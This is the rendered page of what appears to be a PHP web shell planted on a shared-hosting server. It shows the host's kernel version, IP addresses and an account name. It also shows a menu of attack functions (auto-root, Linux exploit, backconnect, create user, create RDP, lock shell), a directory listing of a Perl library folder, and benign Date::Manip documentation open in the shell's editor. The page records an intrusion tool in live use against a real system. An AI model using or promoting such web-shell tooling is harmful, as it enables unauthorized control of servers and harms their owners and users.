Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Date /
Manip /
[ HOME SHELL ]
Name
Size
Permission
Action
Lang
[ DIR ]
drwxr-xr-x
Offset
[ DIR ]
drwxr-xr-x
TZ
[ DIR ]
drwxr-xr-x
Base.pm
68.62
KB
-rw-r--r--
Base.pod
14.08
KB
-rw-r--r--
Calc.pod
26.37
KB
-rw-r--r--
Changes5.pod
44.8
KB
-rw-r--r--
Changes5to6.pod
24.34
KB
-rw-r--r--
Changes6.pod
45.64
KB
-rw-r--r--
Config.pod
24.04
KB
-rw-r--r--
ConfigFile.pod
4.82
KB
-rw-r--r--
DM5.pm
230.51
KB
-rw-r--r--
DM5.pod
85.36
KB
-rw-r--r--
DM5abbrevs.pm
7.96
KB
-rw-r--r--
DM6.pm
20.51
KB
-rw-r--r--
DM6.pod
21.83
KB
-rw-r--r--
Date.pm
148.19
KB
-rw-r--r--
Date.pod
60.79
KB
-rw-r--r--
Delta.pm
31.22
KB
-rw-r--r--
Delta.pod
22.27
KB
-rw-r--r--
Examples.pod
9.6
KB
-rw-r--r--
History.pod
7.37
KB
-rw-r--r--
Holidays.pod
9.96
KB
-rw-r--r--
Interfaces.pod
7.83
KB
-rw-r--r--
Lang.pod
4.48
KB
-rw-r--r--
Migration5to6.pod
3.88
KB
-rw-r--r--
Misc.pod
13.52
KB
-rw-r--r--
Obj.pm
7.87
KB
-rw-r--r--
Obj.pod
8.42
KB
-rw-r--r--
Objects.pod
13.25
KB
-rw-r--r--
Problems.pod
22.76
KB
-rw-r--r--
Recur.pm
74.4
KB
-rw-r--r--
Recur.pod
43.8
KB
-rw-r--r--
TZ.pm
53.55
KB
-rw-r--r--
TZ.pod
29.41
KB
-rw-r--r--
TZ_Base.pm
10.7
KB
-rw-r--r--
TZ_Base.pod
1.34
KB
-rw-r--r--
TZdata.pm
38.33
KB
-rw-r--r--
TZdata.pod
2.25
KB
-rw-r--r--
Zones.pm
136.21
KB
-rw-r--r--
Zones.pod
152.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TZ_Base.pod
# Copyright (c) 2010-2021 Sullivan Beck. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. =pod =head1 NAME Date::Manip::TZ_Base - Methods common to the TZ and Base classes =head1 SYNOPSIS The Date::Manip::TZ_Base class is a second base class used for the following Date::Manip classes: =over 4 =item L<Date::Manip::Base> =item L<Date::Manip::TZ> =back This module is not intended to be called directly and performs no useful function by itself. Instead, use the various derived classes which inherit from it. =head1 DESCRIPTION This module contains no public methods and is used internally by the Base and TZ classes. In some instances, basic date operations depend on timezone information, and all timezone operations depend on the base class. In order to avoid a circular dependency, I created this class which allowed me to avoid that. =head1 KNOWN BUGS None known. =head1 BUGS AND QUESTIONS Please refer to the L<Date::Manip::Problems> documentation for information on submitting bug reports or questions to the author. =head1 SEE ALSO L<Date::Manip> - main module documentation =head1 LICENSE This script is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 AUTHOR Sullivan Beck (sbeck@cpan.org) =cut
Close